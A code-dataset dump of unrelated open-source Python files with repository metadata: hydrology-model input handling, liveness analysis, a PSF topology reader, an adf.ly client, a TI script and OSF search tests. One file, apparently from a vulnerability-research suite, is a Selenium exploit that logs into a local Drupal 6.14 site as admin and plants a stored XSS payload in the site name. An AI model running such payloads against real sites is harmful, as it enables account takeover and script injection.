                        + ") not present, returning "
                        + str(default)
                    )
                if fail:
                    if not silent:
                        self.logger.error(
                            "Required map: "
                            + os.path.abspath(path)
                            + " not found, exiting.."
                        )
                    raise ValueError("Input state variable not found")
                return pcr.cover(pcr.scalar(default))
        else:  # Assuming we are in pre-or post loop within the framwork
            if "None" not in self.ncfilestatic:
                retval, succ = self.NcInputStatic.gettimestep(
                    1, self.logger, var=varname
                )
                if succ:
                    return retval
                else:
                    if fail:
                        if not silent:
                            self.logger.error(
                                "Required map: "
                                + os.path.abspath(path)
                                + " not found in "
                                + self.ncfilestatic
                                + " exiting.."
                            )
                        raise ValueError("Input variable not found in netcdf")
                    else:
                        return self.TheClone + default
            if os.path.isfile(path):
                mapje = pcr.readmap(path)
                return mapje
            else:
                if verbose:
                    self.logger.debug(
                        "Static input data ("
                        + os.path.abspath(path)
                        + ") not present, returning "
                        + str(default)
                    )
                if fail:
                    if not silent:
                        self.logger.error(
                            "Required map: "
                            + os.path.abspath(path)
                            + " not found, exiting.."
                        )
                    raise ValueError("Input variable not found")
                return self.TheClone + default
    elif style == 2:  # Assuming they are set in memory by the API
        #
        # first get basename (last bit of path)
        name = os.path.basename(name)
        if hasattr(self._userModel(), name):
            return pcr.cover(getattr(self._userModel(), name), pcr.scalar(default))
        else:
            self.logger.warning(
                "Variable: " + name + " not set by API, returning default"
            )
            setattr(self._userModel(), name, pcr.cover(pcr.scalar(default)))
            return getattr(self._userModel(), name)
    else:
        self.logger.warning(
            "Unknown style ("
            + str(style)
            + ") for variable: "
            + name
            + ", returning default"
        )
        return self.TheClone + default
## \brief testing the requirements for the dynamic framework
#
# To use the dynamic framework the user must implement the following methods
# in this class:
# - either "run" or "initial" and "dynamic"
def _testRequirements(self):
    """Check that the user model implements what the dynamic framework needs.

    Requires either a "run" or a "dynamic" method; warns (in debug mode)
    about missing "initial" and "stateVariables" sections.
    """
    usermodel = self._userModel()
    if hasattr(usermodel, "_userModel"):
        self.showWarning("The _userModel method is deprecated and obsolete")
    if not (hasattr(usermodel, "dynamic") or hasattr(usermodel, "run")):
        raise frameworkBase.FrameworkError(
            "Cannot run dynamic framework: Implement dynamic method"
        )
    if not hasattr(usermodel, "initial") and self._debug():
        self.showWarning("No initial section defined.")
    if not hasattr(usermodel, "stateVariables") and self._debug():
        self.showWarning("No stateVariables defined in usermodel.")
def setQuiet(self, quiet):
    """Set both quiet flags (console output and progress dots) at once."""
    self._d_quietProgressDots = quiet
    self._d_quiet = quiet
|
openstreams/wflow
|
wflow/wf_DynamicFramework.py
|
Python
|
gpl-3.0
| 132,587
|
[
"NetCDF"
] |
0fa0913e5b46a7b7a6e0a45ace56a93561e3412bc2858826d7e1c9bc0d6b027a
|
"""Module implements liveness analysis."""
from cfg import AssignmentNode
from copy import deepcopy
from ast import NodeVisitor, Compare, Call
from analysis_base import AnalysisBase
class LivenessAnalysis(AnalysisBase):
    """Implement the liveness analysis transfer rules."""

    def __init__(self, cfg):
        """Initialise the parent analysis with the given cfg and the
        variable-collecting visitor."""
        super(LivenessAnalysis, self).__init__(cfg, VarsVisitor)

    def join(self, cfg_node):
        """Return the union of the old constraints of all outgoing nodes."""
        joined = set()
        for successor in cfg_node.outgoing:
            if successor.old_constraint:
                joined |= successor.old_constraint
        return joined

    def fixpointmethod(self, cfg_node):
        """Set new_constraint on the given cfg node per the liveness rules."""
        node_type = cfg_node.ast_type
        if node_type in (Compare.__name__, Call.__name__):
            # Condition/call rule: JOIN(v) u vars(E).
            constraint = self.join(cfg_node)
            constraint.update(self.annotated_cfg_nodes[cfg_node])
            cfg_node.new_constraint = constraint
        elif isinstance(cfg_node, AssignmentNode):
            # Assignment rule: (JOIN(v) \ {id}) u vars(E).
            constraint = self.join(cfg_node)
            constraint.discard(cfg_node.ast_node.targets[0].id)
            constraint.update(self.annotated_cfg_nodes[cfg_node])
            cfg_node.new_constraint = constraint
        elif node_type in ("ENTRY", "EXIT"):
            # Entry/exit rule: the constraint stays empty.
            pass
        else:
            # All other nodes simply propagate the join.
            cfg_node.new_constraint = self.join(cfg_node)
class VarsVisitor(NodeVisitor):
    """AST visitor that collects the variable names needed by the
    liveness analysis, appended to ``self.result`` in visit order."""

    def __init__(self):
        """Start with an empty result list."""
        self.result = []

    def visit_Name(self, node):
        """Record every variable name encountered."""
        self.result.append(node.id)

    # Condition and call rule
    def visit_Call(self, node):
        """Only the call's arguments (positional and keyword) contribute
        variables; the function name itself is not recorded."""
        for child in list(node.args) + list(node.keywords):
            self.visit(child)

    def visit_keyword(self, node):
        self.visit(node.value)

    def visit_Compare(self, node):
        self.generic_visit(node)

    # Assignment rule
    def visit_Assign(self, node):
        """Only the right-hand side of an assignment contributes."""
        self.visit(node.value)
|
SW10IoT/pyt
|
pyt/liveness.py
|
Python
|
gpl-2.0
| 2,474
|
[
"VisIt"
] |
e8b4ba3aeba4f4f8020eab425433cd3efc99b7b65524484092e5106862e94272
|
# -*- coding: utf-8 -*-
# MolMod is a collection of molecular modelling tools for python.
# Copyright (C) 2007 - 2019 Toon Verstraelen <Toon.Verstraelen@UGent.be>, Center
# for Molecular Modeling (CMM), Ghent University, Ghent, Belgium; all rights
# reserved unless otherwise stated.
#
# This file is part of MolMod.
#
# MolMod is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# MolMod is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
"""Tools for reading and writing PSF (Protein Structure File) files
This format was originally developed in conjunction with the CHARMM program,
but is also used by CP2K as a generic format to define the molecular bond
graph and other topological aspects of a molecular model. This module just
creates files that can be read with CP2K.
Due to the lack of public definition of a PSF file format, several variations
exist. Therefore we do not make any attempt to follow the original format
strictly, nor one of these variations. It would be more interesting to
define a new public standard for molecular topologies, which is also suitable
for non-protein systems.
"""
from __future__ import print_function, division
import numpy as np
from molmod.periodic import periodic
from molmod.units import unified
from molmod.graphs import CriteriaSet, GraphSearch
from molmod.molecular_graphs import MolecularGraph, BondPattern, \
BendingAnglePattern, DihedralAnglePattern, OutOfPlanePattern, \
HasNumNeighbors
from molmod.graphs import Graph
from molmod.io.common import FileFormatError
__all__ = ["PSFFile"]
class PSFFile(object):
"A very simplistic and limited implementation of the PSF file format"
def __init__(self, filename=None):
    """
    Argument:
     | ``filename``  --  When not given, an empty data structure is
                         created, otherwise the file is loaded from disk
    """
    if filename is not None:
        self.read_from_file(filename)
    else:
        self.clear()
def clear(self):
    """Reset the topology to an empty data structure."""
    self.title = None
    self.numbers = np.zeros(0, int)
    # Atom types from the second column; used to associate FF parameters.
    self.atom_types = []
    self.charges = []  # force-field charges
    # A name that is unique for the molecule composition and connectivity.
    self.names = []
    self.molecules = np.zeros(0, int)  # a counter for each molecule
    # Connectivity tables: index tuples per bond/bend/dihedral/improper.
    self.bonds = np.zeros((0, 2), int)
    self.bends = np.zeros((0, 3), int)
    self.dihedrals = np.zeros((0, 4), int)
    self.impropers = np.zeros((0, 4), int)
    self.name_cache = {}
def read_from_file(self, filename):
    """Load a PSF file.

    The file is first split into its named sections; the supported
    sections (TITLE, ATOM, BOND, THETA, PHI, IMPHI) are then interpreted.
    """
    self.clear()
    with open(filename) as f:
        # A) check the first line
        line = next(f)
        if not line.startswith("PSF"):
            raise FileFormatError("Error while reading: A PSF file must start with a line 'PSF'.")
        # B) read in all the sections, without interpreting them
        current_section = None
        sections = {}
        for line in f:
            line = line.strip()
            if line == "":
                continue
            elif "!N" in line:
                # A header like "     42 !NATOM" starts a new section.
                words = line.split()
                current_section = []
                section_name = words[1][2:]
                if section_name.endswith(":"):
                    section_name = section_name[:-1]
                sections[section_name] = current_section
            else:
                current_section.append(line)
    # C) interpret the supported sections
    # C.1) The title
    self.title = sections['TITLE'][0]
    molecules = []
    numbers = []
    # C.2) The atoms and molecules
    for line in sections['ATOM']:
        words = line.split()
        self.atom_types.append(words[5])
        self.charges.append(float(words[6]))
        self.names.append(words[3])
        molecules.append(int(words[2]))
        # Look the element up once; unknown symbols get atom number 0.
        # (The original performed the periodic lookup twice.)
        atom = periodic[words[4]]
        if atom is None:
            numbers.append(0)
        else:
            numbers.append(atom.number)
    self.molecules = np.array(molecules)-1
    self.numbers = np.array(numbers)
    self.charges = np.array(self.charges)
    # C.3) The bonds section (1-based on file, 0-based in memory)
    tmp = []
    for line in sections['BOND']:
        tmp.extend(int(word) for word in line.split())
    self.bonds = np.reshape(np.array(tmp), (-1, 2))-1
    # C.4) The bends section
    tmp = []
    for line in sections['THETA']:
        tmp.extend(int(word) for word in line.split())
    self.bends = np.reshape(np.array(tmp), (-1, 3))-1
    # C.5) The dihedral section
    tmp = []
    for line in sections['PHI']:
        tmp.extend(int(word) for word in line.split())
    self.dihedrals = np.reshape(np.array(tmp), (-1, 4))-1
    # C.6) The improper section
    tmp = []
    for line in sections['IMPHI']:
        tmp.extend(int(word) for word in line.split())
    self.impropers = np.reshape(np.array(tmp), (-1, 4))-1
def _get_name(self, graph, group=None):
    """Return a short name that is unique for the graph's topology.

    The result is insensitive to the order of the atoms in the graph;
    previously seen fingerprints reuse their cached name.
    """
    if group is not None:
        graph = graph.get_subgraph(group, normalize=True)
    key = graph.fingerprint.tobytes()
    cached = self.name_cache.get(key)
    if cached is None:
        cached = "NM%02i" % len(self.name_cache)
        self.name_cache[key] = cached
    return cached
def write_to_file(self, filename):
"""Write the data structure to a file"""
with open(filename, 'w') as f:
self.dump(f)
    def dump(self, f):
        """Dump the data structure to a file-like object in PSF format.

        Sections are written in order: header, title, atoms, bonds, bending
        angles, dihedral angles and improper dihedrals, followed by empty
        donor/non-bonded/group sections. All indices are written 1-based,
        as the file format expects.

        NOTE(review): standard PSF files also carry an !NACC section between
        !NDON and !NNB; it is omitted here — confirm downstream readers
        accept that.
        """
        # header
        print("PSF", file=f)
        print(file=f)
        # title
        print(" 1 !NTITLE", file=f)
        print(self.title, file=f)
        print(file=f)
        # atoms: one fixed-width record per atom; the mass is converted to
        # unified atomic mass units
        print("% 7i !NATOM" % len(self.numbers), file=f)
        if len(self.numbers) > 0:
            for index, (number, atom_type, charge, name, molecule) in enumerate(zip(self.numbers, self.atom_types, self.charges, self.names, self.molecules)):
                atom = periodic[number]
                print("% 7i % 4s % 4i NAME % 6s % 6s % 8.4f % 12.6f 0" % (
                    index + 1,
                    name,
                    molecule + 1,
                    atom.symbol,
                    atom_type,
                    charge,
                    atom.mass/unified,
                ), file=f)
        print(file=f)
        # bonds: atom-index pairs, flushed 8 indices (4 bonds) per line
        print("% 7i !NBOND" % len(self.bonds), file=f)
        if len(self.bonds) > 0:
            tmp = []
            for bond in self.bonds:
                tmp.extend(bond+1)
                if len(tmp) >= 8:
                    print(" ".join("% 7i" % v for v in tmp[:8]), file=f)
                    tmp = tmp[8:]
            # remaining partial line, if any
            if len(tmp) > 0:
                print(" ".join("% 7i" % v for v in tmp), file=f)
        print(file=f)
        # bends: atom-index triples, flushed 9 indices (3 angles) per line
        print("% 7i !NTHETA" % len(self.bends), file=f)
        if len(self.bends) > 0:
            tmp = []
            for bend in self.bends:
                tmp.extend(bend+1)
                if len(tmp) >= 9:
                    print(" " + (" ".join("% 6i" % v for v in tmp[:9])), file=f)
                    tmp = tmp[9:]
            if len(tmp) > 0:
                print(" " + (" ".join("% 6i" % v for v in tmp)), file=f)
        print(file=f)
        # dihedrals: atom-index quadruples, flushed 8 indices (2 dihedrals)
        # per line
        print("% 7i !NPHI" % len(self.dihedrals), file=f)
        if len(self.dihedrals) > 0:
            tmp = []
            for dihedral in self.dihedrals:
                tmp.extend(dihedral+1)
                if len(tmp) >= 8:
                    print(" " + (" ".join("% 6i" % v for v in tmp[:8])), file=f)
                    tmp = tmp[8:]
            if len(tmp) > 0:
                print(" " + (" ".join("% 6i" % v for v in tmp)), file=f)
        print(file=f)
        # impropers: same layout as the dihedral section
        print("% 7i !NIMPHI" % len(self.impropers), file=f)
        if len(self.impropers) > 0:
            tmp = []
            for improper in self.impropers:
                tmp.extend(improper+1)
                if len(tmp) >= 8:
                    print(" " + (" ".join("% 6i" % v for v in tmp[:8])), file=f)
                    tmp = tmp[8:]
            if len(tmp) > 0:
                print(" " + (" ".join("% 6i" % v for v in tmp)), file=f)
        print(file=f)
        # not implemented fields: written as empty sections
        print(" 0 !NDON", file=f)
        print(file=f)
        print(" 0 !NNB", file=f)
        print(file=f)
        print(" 0 !NGRP", file=f)
        print(file=f)
def add_molecule(self, molecule, atom_types=None, charges=None, split=True):
"""Add the graph of the molecule to the data structure
The molecular graph is estimated from the molecular geometry based on
interatomic distances.
Argument:
| ``molecule`` -- a Molecule instance
Optional arguments:
| ``atom_types`` -- a list with atom type strings
| ``charges`` -- The net atom charges
| ``split`` -- When True, the molecule is split into disconnected
molecules [default=True]
"""
molecular_graph = MolecularGraph.from_geometry(molecule)
self.add_molecular_graph(molecular_graph, atom_types, charges, split, molecule)
def add_molecular_graph(self, molecular_graph, atom_types=None, charges=None, split=True, molecule=None):
"""Add the molecular graph to the data structure
Argument:
| ``molecular_graph`` -- a MolecularGraph instance
Optional arguments:
| ``atom_types`` -- a list with atom type strings
| ``charges`` -- The net atom charges
| ``split`` -- When True, the molecule is split into disconnected
molecules [default=True]
"""
# add atom numbers and molecule indices
new = len(molecular_graph.numbers)
if new == 0: return
prev = len(self.numbers)
offset = prev
self.numbers = np.resize(self.numbers, prev + new)
self.numbers[-new:] = molecular_graph.numbers
if atom_types is None:
atom_types = [periodic[number].symbol for number in molecular_graph.numbers]
self.atom_types.extend(atom_types)
if charges is None:
charges = [0.0]*len(molecular_graph.numbers)
self.charges.extend(charges)
self.molecules = np.resize(self.molecules, prev + new)
# add names (autogenerated)
if split:
groups = molecular_graph.independent_vertices
names = [self._get_name(molecular_graph, group) for group in groups]
group_indices = np.zeros(new, int)
for group_index, group in enumerate(groups):
for index in group:
group_indices[index] = group_index
self.names.extend([names[group_index] for group_index in group_indices])
if prev == 0:
self.molecules[:] = group_indices
else:
self.molecules[-new:] = self.molecules[-new]+group_indices+1
else:
if prev == 0:
self.molecules[-new:] = 0
else:
self.molecules[-new:] = self.molecules[-new]+1
name = self._get_name(molecular_graph)
self.names.extend([name]*new)
self._add_graph_bonds(molecular_graph, offset, atom_types, molecule)
self._add_graph_bends(molecular_graph, offset, atom_types, molecule)
self._add_graph_dihedrals(molecular_graph, offset, atom_types, molecule)
self._add_graph_impropers(molecular_graph, offset, atom_types, molecule)
def _add_graph_bonds(self, molecular_graph, offset, atom_types, molecule):
# add bonds
match_generator = GraphSearch(BondPattern([CriteriaSet()]))
tmp = sorted([(
match.get_destination(0),
match.get_destination(1),
) for match in match_generator(molecular_graph)])
new = len(tmp)
if new > 0:
prev = len(self.bonds)
self.bonds = np.resize(self.bonds, (prev + len(tmp), 2))
self.bonds[-len(tmp):] = tmp
self.bonds[-len(tmp):] += offset
def _add_graph_bends(self, molecular_graph, offset, atom_types, molecule):
# add bends
match_generator = GraphSearch(BendingAnglePattern([CriteriaSet()]))
tmp = sorted([(
match.get_destination(0),
match.get_destination(1),
match.get_destination(2),
) for match in match_generator(molecular_graph)])
new = len(tmp)
if new > 0:
prev = len(self.bends)
self.bends = np.resize(self.bends, (prev + len(tmp), 3))
self.bends[-len(tmp):] = tmp
self.bends[-len(tmp):] += offset
def _add_graph_dihedrals(self, molecular_graph, offset, atom_types, molecule):
# add dihedrals
match_generator = GraphSearch(DihedralAnglePattern([CriteriaSet()]))
tmp = sorted([(
match.get_destination(0),
match.get_destination(1),
match.get_destination(2),
match.get_destination(3),
) for match in match_generator(molecular_graph)])
new = len(tmp)
if new > 0:
prev = len(self.dihedrals)
self.dihedrals = np.resize(self.dihedrals, (prev + len(tmp), 4))
self.dihedrals[-len(tmp):] = tmp
self.dihedrals[-len(tmp):] += offset
def _add_graph_impropers(self, molecular_graph, offset, atom_types, molecule):
# add improper dihedrals, only when center has three bonds
match_generator = GraphSearch(OutOfPlanePattern([CriteriaSet(
vertex_criteria={0: HasNumNeighbors(3)},
)], vertex_tags={1:1}))
tmp = sorted([(
match.get_destination(0),
match.get_destination(1),
match.get_destination(2),
match.get_destination(3),
) for match in match_generator(molecular_graph)])
new = len(tmp)
if new > 0:
prev = len(self.impropers)
self.impropers = np.resize(self.impropers, (prev + len(tmp), 4))
self.impropers[-len(tmp):] = tmp
self.impropers[-len(tmp):] += offset
def get_graph(self):
"""Return the bond graph represented by the data structure"""
return Graph(self.bonds)
def get_molecular_graph(self):
"""Return the molecular graph represented by the data structure"""
return MolecularGraph(self.bonds, self.numbers)
def get_groups(self):
"""Return a list of groups of atom indexes
Each atom in a group belongs to the same molecule or residue.
"""
groups = []
for a_index, m_index in enumerate(self.molecules):
if m_index >= len(groups):
groups.append([a_index])
else:
groups[m_index].append(a_index)
return groups
|
molmod/molmod
|
molmod/io/psf.py
|
Python
|
gpl-3.0
| 16,026
|
[
"CHARMM",
"CP2K"
] |
a57b1729037e39a20e7b1eb583cb2fac50bc120b44db19076214e9efb42a2382
|
# encoding: utf-8
"""
Adf.ly shortener implementation
Needs api key and uid
"""
from ..exceptions import ShorteningErrorException
from .base import BaseShortener
class Adfly(BaseShortener):
    """Adf.ly URL shortener backend.

    Requires an API ``key`` and ``uid``; the optional ``type`` selects the
    advert style ('int' or 'banner').
    """
    api_url = 'http://api.adf.ly/api.php'

    def __init__(self, **kwargs):
        # Both credentials are mandatory; bail out early when either is
        # missing or falsy.
        if not (kwargs.get('key', False) and kwargs.get('uid', False)):
            raise TypeError('Please input the key and uid value')
        self.key = kwargs.get('key')
        self.uid = kwargs.get('uid')
        self.type = kwargs.get('type', 'int')
        super(Adfly, self).__init__(**kwargs)

    def short(self, url):
        """Shorten ``url`` via the adf.ly API and return the response text."""
        payload = {
            'domain': 'adf.ly',
            'advert_type': self.type,  # int or banner
            'key': self.key,
            'uid': self.uid,
            'url': url,
        }
        response = self._get(self.api_url, params=payload)
        if not response.ok:
            raise ShorteningErrorException('There was an error shortening this '
                                           'url - {0}'.format(response.content))
        return response.text
|
RuiNascimento/krepo
|
script.areswizard/pyshorteners/shorteners/adfly.py
|
Python
|
gpl-2.0
| 1,065
|
[
"ADF"
] |
b69ce741b714bf96c9efdb3e858730ebc32e0f3b75d97ec509b20298a9af1d13
|
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
# POC: http://www.exploit-db.com/exploits/18791/
class Exploit (framework.Exploit):
    attributes = {'Name' : "DRUPAL_DP0001",
                  'Description' : "Drupal 5.20 and 6.14 (Core) XSS Vulnerabilities",
                  'References' : [],
                  'Target' : "Drupal 6.14",
                  'TargetLicense' : '',
                  'VulWikiPage' : "http://seamster.cs.umd.edu/vulwiki/index.php/Drupal_6.14",
                  'Type' : 'XSS',
                  'Privileged' : True
                  }

    def __init__(self, visible=False):
        framework.Exploit.__init__(self, visible)

    def exploit(self):
        """Log in as the Drupal admin and plant an XSS payload in the site name."""
        self.logger.info("Running Exploit()")
        payload = "</title><script>alert(\'xss\');</script>"
        browser = self.create_selenium_driver()
        # Authenticate against the local Drupal instance.
        browser.get("http://localhost/drupal/")
        self.logger.info("Page opened successfully: %s", browser.title)
        browser.get_element(by_id="edit-name").send_keys("drupaladmin")
        browser.get_element(by_id="edit-pass").send_keys("drupaladminpw21")
        browser.get_element(by_id="edit-submit").click()
        # Store the payload as the site name via the settings form.
        self.logger.info("Changing site name...")
        browser.get("http://localhost/drupal/?q=admin/settings/site-information")
        site_name_field = browser.get_element(by_id="edit-site-name")
        site_name_field.clear()
        site_name_field.send_keys(payload)
        browser.get_element(by_id="edit-submit").click()
        self.logger.info("Payload sent")
        self.logger.info("visit http://localhost/drupal/ to see XSS")
        browser.cleanup()

    def verify(self):
        """Return True when visiting the front page triggers the XSS alert."""
        browser = self.create_selenium_driver()
        browser.get("http://127.0.0.1/drupal/")
        try:
            browser.get_alert()
        except NoAlertPresentException:
            self.logger.error("XSS failed")
            confirmed = False
        else:
            self.logger.info("XSS popup comfirmed")
            confirmed = True
        browser.cleanup()
        return confirmed
|
UMD-SEAM/bugbox
|
framework/Exploits/DRUPAL_DP0001.py
|
Python
|
bsd-3-clause
| 2,325
|
[
"VisIt"
] |
3dde71de53c1cda88045152db392cd0a692235706938d4bdc60e6b2b96c0ca7c
|
# Author: Samuel Genheden samuel.genheden@gmail.com
"""
Program to collect TI results for a list of output
Examples:
collect_ti.py list
"""
import argparse
import os
import numpy as np
def _integrate(filename):
    """Read a free-energy gradient profile from a Lammps output file and
    integrate it over lambda with the trapezoidal rule.

    The first two lines of the file are treated as a header. A sentinel row
    at lambda=1 is appended, whose gradient is linearly extrapolated from
    the last two simulated lambda values.
    """
    with open(filename, "r") as handle:
        rows = handle.readlines()
    rows.append("0.0 1.0 0.0")  # placeholder end point at lambda = 1
    table = np.array([row.strip().split() for row in rows[2:]], dtype=float)
    lam = table[:, 1]
    grad = table[:, 2]
    # Evaluate the linear fit at lambda=1: slope + intercept == sum of coeffs
    grad[-1] = np.polyfit(lam[-3:-1], grad[-3:-1], 1).sum()
    return np.trapz(grad, x=lam)
if __name__ == '__main__':
    # NOTE: this script is Python 2 (print statements below).
    argparser = argparse.ArgumentParser(description="Script to collect output and do TI")
    argparser.add_argument('outlist', help="the output list")
    argparser.add_argument('-outdir','--outdir',help="the directory with output files",default=".")
    argparser.add_argument('--fulloutput',action="store_true",default=False,help="if the output the individual results")
    argparser.add_argument('--prefix',help="the filename prefix")
    argparser.add_argument('--postfix',help="the filename postfix")
    args = argparser.parse_args()
    # Normalise the optional prefix/postfix into directly concatenable strings
    if args.prefix is not None:
        args.prefix = args.prefix+"-"
    else:
        args.prefix = ""
    if args.postfix is not None:
        args.postfix = "-"+args.postfix
    else:
        args.postfix = ""
    # One result file per entry in the list file
    filenames = [s.strip() for s in open(args.outlist,'r').readlines()]
    for filename0 in filenames:
        filename = os.path.join(args.outdir,
                    "out.dPotEngSS_%s%s%s"%(args.prefix,filename0,args.postfix))
        dglist = [_integrate(filename)]
        # Repeats live in subdirectories R2..R10; stop at the first one that
        # cannot be read
        for repeat in range(2,11):
            filename = os.path.join(args.outdir,"R%d"%repeat,
                        "out.dPotEngSS_%s%s%s"%(args.prefix,filename0,args.postfix))
            try:
                dg_repeat = _integrate(filename)
            except:
                # NOTE(review): bare except — presumably meant for a missing
                # repeat file/directory; consider narrowing to IOError
                nomore = True
            else:
                dglist.append(dg_repeat)
                nomore = False
            if nomore: break
        print "%s"%(filename0),
        if args.fulloutput :
            # per-repeat values; -dg*4.184 flips the sign and appears to
            # convert kcal -> kJ — TODO confirm units
            print "\t"+"\t".join("%.3f"%(-dg*4.184) for dg in dglist),
        # Mean and standard error over the repeats (zero error for a single
        # repeat)
        if len(dglist) == 1:
            dg = dglist[0]
            std = 0.0
        else:
            dg = np.asarray(dglist).mean()
            std = np.asarray(dglist).std()/np.sqrt(len(dglist))
        print "\t%.3f\t%.3f"%(-dg*4.184,std*4.184)
|
SGenheden/Scripts
|
Lammps/collect_ti.py
|
Python
|
mit
| 2,550
|
[
"LAMMPS"
] |
db66b0434fe2b7d73439af4c5183fa90a772aa9be4ae22a97d681421fdd95371
|
# -*- coding: utf-8 -*-
import unittest
import logging
from nose.tools import * # flake8: noqa (PEP8 asserts)
from framework.auth.core import Auth
from website import settings
import website.search.search as search
from website.search import elastic_search
from website.search.util import build_query
from website.search_migration.migrate import migrate
from tests.base import OsfTestCase
from tests.test_features import requires_search
from tests.factories import (
UserFactory, ProjectFactory, NodeFactory,
UnregUserFactory, UnconfirmedUserFactory
)
TEST_INDEX = 'test'
@requires_search
class SearchTestCase(OsfTestCase):
    """Base case that points the search engine at a scratch test index."""

    def setUp(self):
        super(SearchTestCase, self).setUp()
        # Redirect all search traffic to the dedicated test index and start
        # from an empty one.
        elastic_search.INDEX = TEST_INDEX
        settings.ELASTIC_INDEX = TEST_INDEX
        search.delete_index(elastic_search.INDEX)
        search.create_index(elastic_search.INDEX)

    def tearDown(self):
        super(SearchTestCase, self).tearDown()
        # Leave a fresh, empty index behind for whatever runs next.
        search.delete_index(elastic_search.INDEX)
        search.create_index(elastic_search.INDEX)
def query(term):
    """Run ``term`` through the search API against the current test index."""
    return search.search(build_query(term), index=elastic_search.INDEX)
def query_user(name):
    """Search the user category for an exact-phrase match on ``name``."""
    return query('category:user AND "{}"'.format(name))
@requires_search
class TestUserUpdate(SearchTestCase):
    """Checks that user lifecycle events are mirrored in the search index."""

    def setUp(self):
        super(TestUserUpdate, self).setUp()
        search.delete_index(elastic_search.INDEX)
        search.create_index(elastic_search.INDEX)
        self.user = UserFactory(fullname='David Bowie')

    def test_new_user(self):
        # Verify that user has been added to Elastic Search
        docs = query_user(self.user.fullname)['results']
        assert_equal(len(docs), 1)

    def test_new_user_unconfirmed(self):
        # Unconfirmed accounts must stay out of the index until the email
        # address is confirmed.
        user = UnconfirmedUserFactory()
        docs = query_user(user.fullname)['results']
        assert_equal(len(docs), 0)
        token = user.get_confirmation_token(user.username)
        user.confirm_email(token)
        user.save()
        docs = query_user(user.fullname)['results']
        assert_equal(len(docs), 1)

    def test_change_name(self):
        # Add a user, change her name, and verify that only the new name is
        # found in search.
        user = UserFactory(fullname='Barry Mitchell')
        fullname_original = user.fullname
        user.fullname = user.fullname[::-1]
        user.save()
        docs_original = query_user(fullname_original)['results']
        assert_equal(len(docs_original), 0)
        docs_current = query_user(user.fullname)['results']
        assert_equal(len(docs_current), 1)

    def test_disabled_user(self):
        # Test that disabled users are not in search index
        user = UserFactory(fullname='Bettie Page')
        user.save()
        # Ensure user is in search index
        assert_equal(len(query_user(user.fullname)['results']), 1)
        # Disable the user
        user.is_disabled = True
        user.save()
        # Ensure user is not in search index
        assert_equal(len(query_user(user.fullname)['results']), 0)

    def test_merged_user(self):
        # Merging one account into another should drop the merged account
        # from the index while keeping the surviving one.
        user = UserFactory(fullname='Annie Lennox')
        merged_user = UserFactory(fullname='Lisa Stansfield')
        user.save()
        merged_user.save()
        assert_equal(len(query_user(user.fullname)['results']), 1)
        assert_equal(len(query_user(merged_user.fullname)['results']), 1)
        user.merge_user(merged_user)
        assert_equal(len(query_user(user.fullname)['results']), 1)
        assert_equal(len(query_user(merged_user.fullname)['results']), 0)

    def test_employment(self):
        # Adding a job entry should make its institution searchable.
        user = UserFactory(fullname='Helga Finn')
        user.save()
        institution = 'Finn\'s Fine Filers'
        docs = query_user(institution)['results']
        assert_equal(len(docs), 0)
        user.jobs.append({
            'institution': institution,
            'title': 'The Big Finn',
        })
        user.save()
        docs = query_user(institution)['results']
        assert_equal(len(docs), 1)

    def test_education(self):
        # Adding a school entry should make its institution searchable.
        user = UserFactory(fullname='Henry Johnson')
        user.save()
        institution = 'Henry\'s Amazing School!!!'
        docs = query_user(institution)['results']
        assert_equal(len(docs), 0)
        user.schools.append({
            'institution': institution,
            'degree': 'failed all classes',
        })
        user.save()
        docs = query_user(institution)['results']
        assert_equal(len(docs), 1)

    def test_name_fields(self):
        # Every name component (full, given, middle, family, suffix) should
        # resolve to the same single user document.
        names = ['Bill Nye', 'William', 'the science guy', 'Sanford', 'the Great']
        user = UserFactory(fullname=names[0])
        user.given_name = names[1]
        user.middle_names = names[2]
        user.family_name = names[3]
        user.suffix = names[4]
        user.save()
        docs = [query_user(name)['results'] for name in names]
        assert_equal(sum(map(len, docs)), len(docs))  # 1 result each
        assert_true(all([user._id == doc[0]['id'] for doc in docs]))
@requires_search
class TestProject(SearchTestCase):
    """Indexing behaviour of a single, initially private project."""

    def setUp(self):
        super(TestProject, self).setUp()
        search.delete_index(elastic_search.INDEX)
        search.create_index(elastic_search.INDEX)
        self.user = UserFactory(fullname='John Deacon')
        self.project = ProjectFactory(title='Red Special', creator=self.user)

    def test_new_project_private(self):
        # A freshly created private project must stay out of the index.
        results = query(self.project.title)['results']
        assert_equal(len(results), 0)

    def test_make_public(self):
        # Publishing the project should make it searchable.
        self.project.set_privacy('public')
        results = query(self.project.title)['results']
        assert_equal(len(results), 1)
@requires_search
class TestPublicNodes(SearchTestCase):
    """Index behaviour of public projects, components and registrations."""

    def setUp(self):
        super(TestPublicNodes, self).setUp()
        # NOTE(review): 'usename' looks like a typo for 'username'; the
        # factory most likely ignores it — confirm before relying on it.
        self.user = UserFactory(usename='Doug Bogie')
        self.title = 'Red Special'
        self.consolidate_auth = Auth(user=self.user)
        # One public node of each category, all sharing the same title.
        self.project = ProjectFactory(
            title=self.title,
            creator=self.user,
            is_public=True,
        )
        self.component = NodeFactory(
            parent=self.project,
            title=self.title,
            creator=self.user,
            is_public=True
        )
        self.registration = ProjectFactory(
            title=self.title,
            creator=self.user,
            is_public=True,
            is_registration=True
        )

    def test_make_private(self):
        # Make project public, then private, and verify that it is not present
        # in search.
        self.project.set_privacy('private')
        docs = query('category:project AND ' + self.title)['results']
        assert_equal(len(docs), 0)
        self.component.set_privacy('private')
        docs = query('category:component AND ' + self.title)['results']
        assert_equal(len(docs), 0)
        self.registration.set_privacy('private')
        docs = query('category:registration AND ' + self.title)['results']
        assert_equal(len(docs), 0)

    def test_public_parent_title(self):
        # A public parent's title should be exposed on the component doc.
        self.project.set_title('hello & world', self.consolidate_auth)
        self.project.save()
        docs = query('category:component AND ' + self.title)['results']
        assert_equal(len(docs), 1)
        assert_equal(docs[0]['parent_title'], 'hello & world')
        assert_true(docs[0]['parent_url'])

    def test_make_parent_private(self):
        # Make parent of component, public, then private, and verify that the
